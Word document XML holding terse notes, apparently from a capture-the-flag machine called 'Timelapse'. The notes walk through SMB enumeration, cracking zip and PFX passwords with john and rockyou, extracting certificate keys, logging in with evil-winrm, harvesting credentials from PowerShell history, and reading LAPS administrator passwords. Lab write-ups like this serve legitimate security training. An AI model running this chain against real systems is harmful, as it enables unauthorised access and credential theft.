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0852CBAA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E3187B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Timelapse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51695CC1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E3187B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV t_ip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0E33D850" w:rsidR="00843DCE" w:rsidRDefault="0092407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nxc smb t_ip -u ‘ ‘ -p ‘’ - -shares = not provide anythings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD57A4" w14:textId="082C5150" w:rsidR="00924072" w:rsidRDefault="0092407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smbclient -L //t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56382028" w14:textId="19B18C16" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00A13FA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smbclient //t_ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Shares</w:t>
      </w:r>
      <w:r w:rsidR="00E414BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = in dev we obtain zip file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047FDCC9" w14:textId="63917559" w:rsidR="00E414BD" w:rsidRDefault="00BC530B" w:rsidP="00A13FA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unzip file = but it not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040526C4" w14:textId="23463645" w:rsidR="00BC530B" w:rsidRDefault="00BC530B" w:rsidP="00A13FA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do ./zip2john file</w:t>
      </w:r>
      <w:r w:rsidR="00E74ACC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1004267" w14:textId="7D425B81" w:rsidR="00E74ACC" w:rsidRDefault="00E74ACC" w:rsidP="00A13FA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save in file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0890B3" w14:textId="5C256EEA" w:rsidR="00E74ACC" w:rsidRDefault="00E74ACC" w:rsidP="00A13FA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./zip2john file.zip &gt;&gt; backup.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8AE5A" w14:textId="77777777" w:rsidR="00E66A16" w:rsidRDefault="00E74ACC" w:rsidP="00E66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./john backup.hash - -wordlist=</w:t>
      </w:r>
      <w:r w:rsidR="008D5875">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FEAA17" w14:textId="19444771" w:rsidR="00E74ACC" w:rsidRDefault="00E66A16" w:rsidP="00E66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./john backup.hash - -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="00221F2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ow</w:t>
      </w:r>
      <w:r w:rsidR="00A1223D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = supremelegacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE0CF3" w14:textId="127BDB8F" w:rsidR="00FA4827" w:rsidRDefault="00FA4827" w:rsidP="00E66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unzip file.zip = enter that password</w:t>
      </w:r>
      <w:r w:rsidR="00435F8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we obtain .pfx file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315829B9" w14:textId="4A8366D5" w:rsidR="00155A6D" w:rsidRDefault="00406A4B" w:rsidP="00E66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openssl pkcs12 -in file.pfx </w:t>
      </w:r>
      <w:r w:rsidR="00155A6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-info = we fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4985F1" w14:textId="242AB3C3" w:rsidR="004759C5" w:rsidRDefault="004759C5" w:rsidP="00E66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./pfx2john.py file.pfx</w:t>
      </w:r>
      <w:r w:rsidR="005860FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; auth.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F700967" w14:textId="735D6A6B" w:rsidR="005860FB" w:rsidRDefault="0056511E" w:rsidP="00E66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.john auth.hash - -wordlist=rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44E04B" w14:textId="796EBC1A" w:rsidR="0056511E" w:rsidRDefault="0056511E" w:rsidP="00E66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.john auth.hash - -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>show = thuglegacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E3260" w14:textId="38E53452" w:rsidR="0056511E" w:rsidRDefault="00E7503E" w:rsidP="00E66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openssl pkcs12 -in file.pfx -info = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>input that username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ED20C8" w14:textId="500DE52E" w:rsidR="006D0FB7" w:rsidRDefault="006D0FB7" w:rsidP="00E66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here we obtain the </w:t>
      </w:r>
      <w:r w:rsidR="00CE22D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">private key and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>certifi</w:t>
      </w:r>
      <w:r w:rsidR="00EB3A83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26087DF8" w14:textId="6095A079" w:rsidR="00EB3A83" w:rsidRDefault="004E6DA1" w:rsidP="00E66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openssl pkcs12 -in file.pfx -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nocerts -out key.pem -nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4884BE" w14:textId="31C0B1E3" w:rsidR="004E6DA1" w:rsidRDefault="004E6DA1" w:rsidP="00E66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openssl pkcs12 -in file.pfx -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nokeys -out key.cert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390F6527" w14:textId="1EA86B54" w:rsidR="00944BAE" w:rsidRDefault="00944BAE" w:rsidP="00E66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evil-winrm there ahs -c and -k options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228AD4E" w14:textId="563B7451" w:rsidR="00944BAE" w:rsidRDefault="00944BAE" w:rsidP="00E66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to check winrm with port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0E0AC1" w14:textId="1E10EB26" w:rsidR="00944BAE" w:rsidRDefault="00944BAE" w:rsidP="00E66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nmap -p5986-5956 t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E8E98" w14:textId="78C5EFE8" w:rsidR="00944BAE" w:rsidRDefault="00251970" w:rsidP="00E66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evil-winrm -S -I t_ip -c key.cert -k key.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DDDF47" w14:textId="13C27BEA" w:rsidR="00251970" w:rsidRDefault="00251970" w:rsidP="00E66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user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72383504" w14:textId="01DEAC11" w:rsidR="00251970" w:rsidRDefault="00E805CD" w:rsidP="00E66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gci -force</w:t>
      </w:r>
      <w:r w:rsidR="00987DE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630EBC05" w14:textId="11954D0B" w:rsidR="00987DE8" w:rsidRDefault="000C5620" w:rsidP="00E66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at legacy = cd APPDATA = cd  Roaming = cd Microsoft\windows</w:t>
      </w:r>
      <w:r w:rsidR="00E53C54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\powershell\psreadline</w:t>
      </w:r>
      <w:r w:rsidR="001023F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E16212E" w14:textId="4675D268" w:rsidR="001023F7" w:rsidRDefault="001023F7" w:rsidP="00E66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where the .txt is located</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485823BF" w14:textId="6FAD8346" w:rsidR="00797B17" w:rsidRDefault="00797B17" w:rsidP="00E66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user = svc_deploy and the string password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="37F6B391" w:rsidR="00843DCE" w:rsidRDefault="002A4CE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nxc smb t_ip -u svc_deploy -p ‘paste’</w:t>
      </w:r>
      <w:r w:rsidR="00972383">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = its done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C43129" w14:textId="187FFC23" w:rsidR="00972383" w:rsidRDefault="0097238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evil-winrm -I t_ip -u ‘svc_deploy’ -p ‘paste’ = its done. if fail add -S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA5B396" w14:textId="1A6C729A" w:rsidR="002E4515" w:rsidRDefault="00A345A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cannot able to perform bloodhound,. We try but fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A1CC4" w14:textId="63892531" w:rsidR="002E4515" w:rsidRDefault="00E20C9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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ABCBC1" w14:textId="146F3A12" w:rsidR="003D5CA9" w:rsidRDefault="003D5CA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net user sc_deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7783086A" w14:textId="038808AC" w:rsidR="00E20C97" w:rsidRDefault="0076666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</w:t>
      </w:r>
      <w:r w:rsidR="003D5CA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> last </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we notice LAPS = local administrator password solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A743BFD" w14:textId="2D02BF48" w:rsidR="00766669" w:rsidRDefault="00955A1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google = laps getadcomputer password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58031A47" w14:textId="59621C03" w:rsidR="00447650" w:rsidRDefault="0044765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Get-ADComputer -Filter ‘ObjectClass -eq “computer”’ -Property *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691AF2F7" w14:textId="41035E04" w:rsidR="00447650" w:rsidRDefault="0044765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here we obtain the admPwd which is password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7EC83F" w14:textId="02E1A317" w:rsidR="00447650" w:rsidRDefault="00F725F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evil-winrm -I t_ip -u ‘administrator’ -p ‘paste’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA5FDDC" w14:textId="1B42752F" w:rsidR="003A5E91" w:rsidRDefault="003A5E9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root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C5617" w14:textId="77777777" w:rsidR="00F725F5" w:rsidRDefault="00F725F5" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A531D0B" w14:textId="77777777" w:rsidR="003E74EC" w:rsidRDefault="003E74EC" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406EA92B" w14:textId="77777777" w:rsidR="003E74EC" w:rsidRDefault="003E74EC" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9B0049" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F283509" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396D3FA4" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C2BAD7" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658EEC24" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9D0DD9" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396BAEF3" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE8E6EA" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3EE514" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C52EA46" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB9E761" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698900BB" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD387E7" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C72132" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C97271" w14:textId="77777777" w:rsidR="00A13FAF" w:rsidRDefault="00A13FAF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5074E486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4214A56" w14:textId="5BE3E27E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9. Lessons Learned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0C5620"/>
    <w:rsid w:val="001023F7"/>
    <w:rsid w:val="00155A6D"/>
    <w:rsid w:val="00221F2A"/>
    <w:rsid w:val="00251970"/>
    <w:rsid w:val="002A4CEF"/>
    <w:rsid w:val="002E4515"/>
    <w:rsid w:val="0030695B"/>
    <w:rsid w:val="003A5E91"/>
    <w:rsid w:val="003D5CA9"/>
    <w:rsid w:val="003E74EC"/>
    <w:rsid w:val="00406A4B"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00435F8D"/>
    <w:rsid w:val="00447650"/>
    <w:rsid w:val="004759C5"/>
    <w:rsid w:val="004E6DA1"/>
    <w:rsid w:val="0056511E"/>
    <w:rsid w:val="005860FB"/>
    <w:rsid w:val="006D0FB7"/>
    <w:rsid w:val="00766669"/>
    <w:rsid w:val="00797B17"/>
    <w:rsid w:val="007C0697"/>
    <w:rsid w:val="0083587B"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008D5875"/>
    <w:rsid w:val="00924072"/>
    <w:rsid w:val="00944BAE"/>
    <w:rsid w:val="00955A10"/>
    <w:rsid w:val="00972383"/>
    <w:rsid w:val="00987DE8"/>
    <w:rsid w:val="00A1223D"/>
    <w:rsid w:val="00A13FAF"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A345A9"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A7613E"/>
    <w:rsid w:val="00BC530B"/>
    <w:rsid w:val="00CE22D0"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D255B1"/>
    <w:rsid w:val="00E20C97"/>
    <w:rsid w:val="00E3187B"/>
    <w:rsid w:val="00E414BD"/>
    <w:rsid w:val="00E53C54"/>
    <w:rsid w:val="00E66A16"/>
    <w:rsid w:val="00E74ACC"/>
    <w:rsid w:val="00E7503E"/>
    <w:rsid w:val="00E805CD"/>
    <w:rsid w:val="00EB3A83"/>
    <w:rsid w:val="00EE4A8F"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F725F5"/>
    <w:rsid w:val="00FA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DA1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47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-25T01:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>